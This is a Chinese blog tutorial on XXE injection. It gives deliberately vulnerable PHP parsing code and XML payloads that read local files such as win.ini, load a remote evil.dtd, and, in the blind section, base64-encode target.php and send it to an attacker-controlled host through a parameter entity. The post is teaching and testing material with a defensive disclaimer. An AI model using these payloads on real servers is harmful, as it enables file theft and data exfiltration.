XXE漏洞解析演示

最新推荐文章于 2024-06-22 15:01:26 发布
最新推荐文章于 2024-06-22 15:01:26 发布
阅读量354 收藏 1
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25645753/article/details/108391445
版权

一. 源码

1. 有回显有报错测试代码

<?php
	$xml=simplexml_load_string($_GET['xml']);
	// print_r($xml);
	echo $xml
?>

2. 无回显无报错测试代码

 <?php
	$xml=@simplexml_load_string($_POST['xml']);
?>

二. 内部实体演示

// &有问题,必须对&进行编码才可以
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe "Thinking">]><foo>&xxe;</foo>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe "Thinking">]><foo>%26xxe;</foo>

在这里插入图片描述

三. 外部实体演示

<!ENTITY 实体名称 SYSTEM "URI/URL">

外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下所示:
在这里插入图片描述

<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >]><foo>%26xxe;</foo>
// 只适用于PHP5.4.45以下版本

在这里插入图片描述

四. 参数实体演示

<!ENTITY % 实体名称 “实体的值”>
// or
<!ENTITY % 实体名称 SYSTEMURI>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY  % xxe SYSTEM "http://10.1.1.240:8080/evil.dtd">%xxe;]><foo>&evil;</foo>
evil.dtd
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

在这里插入图片描述

五. 无回显演示

// target.php是已知的文件或flage
<!DOCTYPE updateProfile [<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./target.php"><!ENTITY % dtd SYSTEM "http://10.10.87.228:81/3.txt">%dtd;%send;]>
// evil.dtd
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM ‘http://10.1.1.240:8080/?data=%file;’>" > %all;
target.php
sms2056

在这里插入图片描述
在这里插入图片描述

六. 参考

https://www.freebuf.com/column/156863.html

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

蜜罐小明哥
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞的产生是因为 XML 解析器对外部实体的处理不当。攻击者可以构造恶意的 XML 文档,使得服务器将任意文件读取出来。这种攻击方式称为 XXE Injection。XXE 漏洞的测试原理可以分为以下几个步骤: 首先,攻击者...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
XXE漏洞演示
bring_coco的博客
12-20 770
环境:phpstudy+xml.php 无回显用到虚拟机kali Xml.php代码如下: <?php libxml_disable_entity_loader (false); //这里相当于开启外部实体 //若为true,则表示禁用外部实体 $xmlfile = file_get_contents('php://input'); //可以获取POST来的数据 $dom = new DOMDocument(); $dom->loadXML($xm
xxe漏洞原理和案例实验演示
北冥有鱼
05-30 1228
什么是xml? xml一般指可扩展标记语言 可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构...
一文讲清XXE漏洞原理及利用(干货)
最新发布
2301_80064376的博客
06-22 439
用途: 用于传输和存储数据。结构: 树状结构,从根部开始扩展到枝叶。特点: 允许用户定义自己的标签和文档结构。作用: 定义XML文档的合法构建模块。声明方式: 内部声明和外部引用。
10-2xxe漏洞原理和案例实验演示
山兔的博客
06-21 598
xml外部实体注入攻击 base on pikachuxml是可扩展的标记语言,它是可以用来存储数据的,看到一些.xml的配置文件,就是用xml来写的,还可以用来传输数据,我们可以直接以xml的格式,把数据给放到请求当中,发给服务器,就像,我们之前用post请求,发送数据一样,像json一样,传一组数据到后台服务端,服务端收到后,会对数据进行解析存储,然后处理等等 DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。 我们xml里面的标签
XXE漏洞-内网探测
小刚的博客
08-21 2212
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 XXE漏洞-内网探测XXE漏洞危害CTF案例 XXE漏洞 XXE :Xml External Entity 外部实体注入攻击 是利用一种xml的语言进行的注入攻击 XXE漏洞原理就不详解了,一搜一大把 危害 可以读取系统文件 获取源代码 进行SSRF 进行Phar触发反序列化 CTF案例 本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]Tr.
利用XXE进行内网主机探测
Vicl1fe的博客
12-22 1348
XXE漏洞大家也应该清楚了,不清楚可以看我的另两篇博客 https://blog.csdn.net/qq_41918771/article/details/103628721 https://blog.csdn.net/qq_41918771/article/details/103641745 内网主机探测 先上脚本 import requests def build_xml(ip): xml...
5、XXE漏洞pdf资料
10-15
总之,XXE漏洞利用了XML解析器处理外部实体时的不安全性。理解XML的结构和解析机制是防止这类攻击的关键。开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞的根源在于XML解析器未禁止加载外部实体。攻击者可以通过提交一个包含恶意外部实体引用的XML文档,诱导服务端解析器执行攻击者控制的资源操作。例如,下面的PoC(Proof of Concept)展示了如何利用XXE读取...
XXE漏洞
一个安全路上的菜鸟
02-17 239
文章目录一、XML基础DTDDTD -实体二、XML外部实体注入(XML External Entity XEE)有回显读取本地敏感文件普通实体引用外部实体参数实体引用外部实体无回显读取本地的敏感文件利用三、总结参考链接 本文只是对XXE漏洞学习,参考多篇文章 一、XML基础 ​ XML 用于编辑电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据,是一种允许用户的对自己的标记语言进行定义...
XXE注入漏洞
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-03 3369
什么是XML 要想清楚XXE漏洞,首先要了解XML XML 可扩展标记语言(EXtensible Markup Language)。 它是一门用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型。 XML 很像HTML,但是标签没有被预定义,需要自行定义标签。它的文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它的设计宗旨是传输数据,而不是显示数据。 php版本大于5.4.45的默认不解析外部实体 传参实体:有% 一般实体:无% xxe漏洞与ssrf漏洞相似 虽然场景不同,
xxe漏洞利用
qq_50673174的博客
05-30 1540
XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
WEB常见漏洞XXE(靶场篇)
Javachichi的博客
11-10 575
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1526
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
XXE外部实体注入漏洞之——漏洞攻防测试
温柔小薛的博客
04-12 675
漏洞攻防测试 概述 利用 xxe 漏洞可以进行拒绝服务攻击(插入DOS攻击),文件读取,命令(代码)执行(需要在编译安装php时,将命令执行模块也安装了),SQL(XSS)注入,内外扫描端口(远程包含漏洞),入侵内网站点等,内网探测和入侵是利用 xxe 中支持的协议进行内网主机和端口发现,可以理解是使用 xxe 进行 SSRF 的利用,基本上都能做 一般 xxe 利用分为两大场景:有回显和无回显。...
XXE漏洞漏洞及利用方法解析
weixin_43749601的博客
03-02 2416
XXE(XML External Entity Injection)即XML外部实体类注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件。 0x001 XML XML设计用来传送及携带数据信息,不用来表现或展示数据,HTML则用来表现数据,所以XML用途的焦点是它说明数据是什么,以
XXE漏洞深度解析与实战演练
XXE漏洞主要发生在使用XML解析器处理用户输入的场景,攻击者可以通过构造恶意的XML文档来获取敏感信息、执行远程代码甚至发起DoS攻击。此外,文中还提到了一个VulnHub靶场XXE Lab:1的过关记录,适合对前后端有一定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值